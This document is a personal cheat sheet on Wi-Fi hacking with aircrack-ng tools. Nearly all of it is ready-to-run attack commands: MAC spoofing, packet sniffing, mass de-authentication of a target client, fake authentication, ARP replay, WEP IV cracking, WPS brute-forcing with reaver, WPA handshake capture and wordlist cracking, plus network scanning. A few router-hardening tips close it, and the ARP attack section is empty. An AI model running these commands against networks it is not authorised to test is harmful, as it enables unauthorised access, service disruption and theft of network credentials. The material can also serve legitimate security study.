Network Hacking Main Page

• Changing MAC Address
• WIFI Sniffing
• De-auth Attack
• Fake-auth Attack
• Creating a Wordlist
• WIFI Password Craking
  • WEP
  • WPS
  • WPA & WPA
• Implement Security for Router
• Network Inforamtion Gathering
• ARP Attack

Show available INTERFACE info

ifconfig
iwconfig

Changing MAC adresse

DESC : Change MAC adresse

MAC = Media Access Control

ifconfig <INTERFACE> down
ifconfig <INTERFACE> hw ether <MAC_ADDRESS> # hw for hardware
ifconfig <INTERFACE> up

Changing wireless mode to Monitor

# step 1
ifconfig <INTERFACE> down
# step 2
airmon-ng check kill
# step 3
iwconfig <INTERFACE> mode monitor
# step 4
ifconfig <INTERFACE> up

WIFI Sniffing

DESC : airodump-ng is a packet sniffer program

• Must have a wifi key in wireless monitor mode
• Use to capture packets within range
• Display detailed info about networks
• part of “aircrak-ng” suit

USAGE : airodump-ng <INTERFACE>

1. Must change wireless mode : Managed to Monitor
2. Run airodump-ng

options :

• --bssid <MAC_ADDRESS> : Select MAC adresse to sniff
  • example

    • airodump-ng --bssid 00:11:22:33:44:55 --channel 2 --write save mon0`
      

• --write <FILE_NAME> : Save the sniffing to a file
  • Use Wireshark to read the .cap file
• --channel <CHANNEL_ID>: Select channel
• --band : Select frequency
  • “a” : use 5Gz only
  • “bg” : use 2.4Gz only
  • “n” : use both
  • “ac” : use lower than 6Gz
  • example

    •  airodump-ng --band abg mon0
      

Simple sniffing 2.4Gz

airodump-ng <INTERFACE>

De-auth Attack with aireplay-ng

USAGE : aireplay-ng --deauth <#DEAUTH_PACKETS> -a <NETWORK_MAC> -c <TARGET_MAC> <INTERFACE>

1. Run aerodump-ng
2. Run aireplay-ng

example :

aireplay-ng --deauth 100000 -a 11:22:33:44:55:66 -c 00:11:22:33:44:55 mon0

Fake-auth Attack with aireplay-ng

USAGE : aireplay-ng --fakeauth <#FAKEAUTH_PACKETS> -a <NETWORK_MAC> -h <INTERFACE_MAC> <INTERFACE>

example:

aireplay-ng --fakeauth 0 -a 11:22:33:44:55:66 -h 00:11:22:33:44:55 mon0

Wordlist with crunch

Desc : Wordlist are used to bruteforce password, here is how to create our own wordlist

USAGE : crunch <MIN> <MAX> <CHARACTERS> -t <PATERN> -o <FILE_NAME>

example

crunch 6 8 123abc$ -t a@@@@b -o wordlist.txt

WIFI password cracking

WEP

DESC : WEP is a very basics RC4 encryption method. that use a random Initialisation Vector (IV) of only from 24 bits to 128 bits
WEP = Wired Equivalent Privacy
IV + Password = Key Stream
In order to get the Password we will perform statistics on packets
IV is added at the beginning of each packet send to the router

If network is busy

1. Change wireless mode to monitor
2. Sniff packets on a specific bssid and channel (Capture a lot of #Data / IVs) and save them in a file .cap
3. Analyse captured IVs by running

     aircrack-ng <FILE_NAME>.cap
   

If network is not busy

We will perform an association (not connection) to force the network to send IVs

1. Change wireless mode to monitor
2. Sniff packets on a specific bssid and channel (Capture a lot of #Data / IVs) and save them in a file .cap
3. Do one Fake Authentification Attack
4. Wait for an ARP packet, and use it to force network to create new IVs

    aireplay-ng --arpreplay -b <NETWORK_MAC> -h <INTERFACE_MAC> <INTERFACE>
   

5. Then Analyse captured IVs by running

    aircrack-ng <FILE_NAME>.cap
   

WPS

DESC : WPS is not a type of encryption but it’s a method to connect without entering password
Used by some printer and easy connect with a WPS button on the router
We will bruteforce the password
Router must be on WPS not be configured “Push Button” or “PBC”, only way to know is to test

1. Change wireless mode to monitor
2. List WPS available

     wash --interface <INTERFACE>
   

3. Do Some (30) Fake Authentification Attack
4. Bruteforce with reaver

    reaver --bssid <NETWORK_MAC> --channel <CHANNEL> --interface <INTERFACE> -vvv --no-associate
   

WPA & WPA2

DESC : WPA fixed WEP vulnerabilities, one way is to bruteforce the password with wordlist.
The main idea is to catch the handshake to then bruteforce
MIC = Message Integrity Code This is the code we try to get correct by testing password from worlist and the data of the handshake (SP address, STA Address, AP Nonce, STA Nonce, EAPOL, Payload).

1. Change wireless mode to monitor
2. Sniff packets on a specific bssid and channel (Wait for capturing the handshake) and save them in a file .cap
3. Do some (4) Fake Authentification Attack
   1. force the handshake on one user
4. With wordlist run aircrack-ng

    aircrack-ng <FILE_NAME>.cap -w <WORDLIST_FILE>
   

Implement Security for Router

Make sur you set WPA2 as encryption Make sur you password is long with capital leters and special characters Make sur to desable WPS

Find router ip

[Windows]
Get-NetRoute

[Linux]
ip route

Network Inforamtion Gathering

With netdiscover

netdiscover -r <IP_RANGE>

example:
netdiscover -r 192.8.4.1/24

With zenmap, a GUI for nmap

1. Set an IP range in the target field
2. Select a Profile
3. Run scan

ARP Attack

TODO